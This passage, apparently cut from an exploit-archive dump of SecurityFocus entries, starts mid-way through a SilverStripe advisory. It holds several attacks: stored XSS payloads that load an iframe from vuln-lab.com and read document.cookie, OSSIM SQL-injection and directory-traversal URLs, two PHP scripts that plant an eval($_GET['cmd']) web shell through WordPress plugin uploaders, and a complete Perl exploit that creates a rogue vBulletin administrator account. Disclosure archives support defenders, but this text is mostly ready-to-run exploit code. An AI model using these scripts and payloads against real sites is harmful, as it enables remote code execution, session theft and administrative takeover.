21-Dec-2013 11:44:27 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20] PoC: (Client-Side Link) http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members ?Title=a%25[PERSISTENT INJECTED SCRIPT CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=& Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2 C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22 currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail %5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken Reference(s): http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit http://www.example.com/admin/security/EditForm/field/Roles/item/new http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm http://www.example.com/admin/security/EditForm/field/Groups/item/4 http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x 1.2 The secound persistent input validation web vulnerability and filter bypass vulnerability can be exploited by remote attackers with low privileged application user accounts with low required user interaction. For demonstration or reproduce ... PoC: Model Admin > Add Company > Edit Company <span class="message validation">'>"<[PERSISTENT INJECTED SCRIPT CODE!]>' ist kein numerischer Wert, nur nummerische Werte sind in diesem Feld erlaubt</span> </div> <div id="CEO" class="field text"> <label class="left" for="Form_ItemEditForm_CEO">CEO</label> <div class="middleColumn"> <input type="text" name="CEO" value=">"<[PERSISTENT INJECTED SCRIPT CODE!])</script>" class="text" id="Form_ItemEditForm_CEO" /> </div> Note: The vulnerability is located in the message validation filter exception-handling. --- PoC Session Request Logs --- Status: 200[OK] POST http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[1309] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=] Content-Length[560] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.7.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmb=1.5.10.1379847854; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: Name[Evolution+Security] Category[TEST+PP] Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] <= [PERSISTENT INJECTED TEST CODES!] CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] RelationFieldsTestPageID[] GridFieldTestPageHasOneID[] SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] action_doSave[1] BackURL [http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:20:33 GMT] Content-Type[text/html] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/; httponly] X-Controller[TestModelAdmin] X-Title[SilverStripe - Test ModelAdmin] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458, /framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, /framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[1309]
-
source: https://www.securityfocus.com/bid/62790/info Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable. http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here% http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%
-
source: https://www.securityfocus.com/bid/62825/info The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability. An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server. <?php # seo-watcher ~ Exploit # http://indonesiancoder.com/ echo <<<EOT EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}"; $url = "{$url}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>
-
source: https://www.securityfocus.com/bid/62899/info Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks. Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected. http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
-
source: https://www.securityfocus.com/bid/62876/info The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server. <?php # woopra plugins ~ Exploit # http://indonesiancoder.com/ # echo <<<EOT EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n -u http://target.com/ The full path to Joomla! -f shell.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}"; $url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>
-
source: https://www.securityfocus.com/bid/62909/info vBulletin is prone to a security-bypass vulnerability. Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions. #!/usr/bin/perl # # Title: vBulletin remote admin injection exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Coded: 17 September 2013 # Published: 24 October 2013 # MorXploit Research # http://www.MorXploit.com # # Vendor: vBulletin (www.vbulletin.com) # Version: 4.1.x / 5.x.x # Vulnerability: Remote admin injection # Severity: High # Status: Confirmed # # Exploit code description: # Perl code to inject a new admin account through upgrade.php script. # # Vulnerability details: # upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading # it only requires the customer number which can be extracted through the same script source code. # # Fix: # Rename or delete the install folder until a fix is released. # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use. Use at your own risk. # # Exploit usage: # # root@MorXploit:/home/simo/morx# perl morxvb.pl localhost # # =================================================== # --- vbulletin admin injection exploit # --- By: Simo Ben youssef <simo_at_morxploit_com> # --- MorXploit Research www.MorXploit.com # =================================================== # [*] Trying to get customer number ... hold on! # [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx! # [*] Trying to MorXploit localhost ... hold on! # [+] Admin account successfully injected! # [+] Admin: MorXploit # [+] Pass: m0rxpl017 use strict; use IO::Socket; if(!defined($ARGV[0])) { system ('clear'); print "\n"; print "===================================================\n"; print "--- vbulletin admin injection exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "===================================================\n"; print "--- Usage: perl $0 target\n\n"; exit; } my $site = $ARGV[0]; ##### Change these as needed ##### my $user = "MorXploit"; my $passwd = "m0rxpl017"; my $email = "dev%40null.com"; my $path = "/install/upgrade.php"; ################################## my $accept = "Accept: */*"; my $ct = "application/x-www-form-urlencoded"; my $port = "80"; system ('clear'); print "\n"; print "===================================================\n"; print "--- vbulletin admin injection exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "===================================================\n"; my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock; print "[*] Trying to get customer number ... hold on!\n"; print $sock "GET $path HTTP/1.1\n"; print $sock "Host: $site\n"; print $sock "$accept\n"; print $sock "Content-Type: $ct\n"; print $sock "Connection: Close\n\n"; my $gotcn; while(my $cn = <$sock>) { if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){ $gotcn = $1; } } if (!defined $gotcn) { print "[-] Failed to get customer number! Nulled? Going to try anyway!\n"; } else { print "[+] Got $gotcn!\n"; } my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0 &only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes& htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat a[confirmpassword]=$passwd&htmldata[email]=$email"; my $cl = length($xploit); my $content = "Content-Length: $cl"; my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock; print "[*] Trying to MorXploit $site ... hold on!\n"; print $sock2 "POST $path HTTP/1.1\n"; print $sock2 "Host: $site\n"; print $sock2 "$accept\n"; print $sock2 "Cookie: bbcustomerid=$gotcn\n"; print $sock2 "Content-Length: $cl\n"; print $sock2 "Content-Type: $ct\n"; print $sock2 "Connection: Close\n\n"; print $sock2 "$xploit\n\n"; while(my $result = <$sock2>){ if ($result =~ /Administrator account created/) { print "[+] Admin account successfully injected!\n"; print "[+] Admin: $user\n"; print "[+] Pass: $passwd\n"; exit; } } print "[-] Failed, something went wrong\n"; exit;